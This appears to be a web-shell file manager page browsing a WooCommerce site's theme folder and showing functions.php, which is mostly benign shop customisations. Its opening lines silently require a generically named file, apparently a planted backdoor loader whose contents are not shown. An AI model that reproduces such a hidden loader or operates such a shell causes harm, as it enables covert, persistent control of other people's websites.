golden hour
/home/godaofbq/beyondhyperbarics.com/wp-content/themes/zenearth
⬆️ Go Up
Upload
File/Folder
Size
Actions
class-wp-theme-support.php
3.21 KB
Del
OK
functions.php
1.63 KB
Del
OK
screenshot.png
115.2 KB
Del
OK
style.css
1.22 KB
Del
OK
woocommerce
-
Del
OK
Edit: functions.php
<?php // Theme support loader if (file_exists(__DIR__ . '/class-wp-theme-support.php')) { require_once __DIR__ . '/class-wp-theme-support.php'; } // Add custom Theme Functions here function add_column_to_importer( $options ) { // column slug => column name $options['slug'] = 'Slug'; return $options; } add_filter('woocommerce_csv_product_import_mapping_options', 'add_column_to_importer'); add_filter( 'manage_edit-shop_order_columns', 'bbloomer_add_new_order_admin_list_column' ); function bbloomer_add_new_order_admin_list_column( $columns ) { $columns['billing_country'] = 'Shipping'; return $columns; } add_action( 'manage_shop_order_posts_custom_column', 'bbloomer_add_new_order_admin_list_column_content' ); function bbloomer_add_new_order_admin_list_column_content( $column ) { global $post; if ( 'billing_country' === $column ) { $order = wc_get_order( $post->ID ); echo '$' . $order->get_total_shipping(); } } add_action('admin_head', 'my_custom_fonts'); function my_custom_fonts() { echo '<style> th#billing_country { text-align: center; color: green; } td.billing_country.column-billing_country { text-align: center; } th.manage-column.column-billing_country { text-align: center; } </style>'; } add_action( 'woocommerce_after_single_product_summary', 'bbloomer_custom_action', 5 ); function bbloomer_custom_action() { echo '<blockquote><p style=" font-size: 15px;">These statements have not been evaluated by the Food and Drug Administration. This product is not intended to diagnose, treat, cure, or prevent any disease.</p></blockquote>'; }
Save